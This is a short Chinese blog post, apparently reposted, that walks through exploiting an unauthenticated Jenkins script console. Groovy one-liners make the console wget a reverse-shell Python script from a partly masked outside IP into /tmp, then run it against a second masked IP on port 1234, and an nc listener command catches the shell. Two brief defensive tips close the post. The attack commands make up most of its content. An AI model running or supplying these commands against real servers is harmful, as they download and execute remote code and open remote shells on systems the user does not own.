Jenkins未授权访问脚本执行漏洞

Jenkins未授权访问脚本执行漏洞

步骤

首先找一个站点挂上一个反弹shell脚本,然后在脚本执行框里执行脚本进行下载到tmp目录:

println "wget http://47.95.XXX.XXX/xxx.py -P /tmp/".execute().text

执行成功下面Result并没有反馈

然后我们执行命令允许反弹shell脚本

println "python /tmp/xxx.py 140.143.xxx.xxx 1234".execute().text

 

此时我们在140.143.xxx.xxx主机上使用nc监听1234端口

nc -l -p 1234

 

ifconfig 查看ip

查看一下当前用户 w命令

防御措施:

1.Jenkins访问进行密码加密

Manage Jenkins -> Configure System -> Enable Security

 

2.不暴露在公网上

转载于:https://www.cnblogs.com/someone9/p/9050028.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值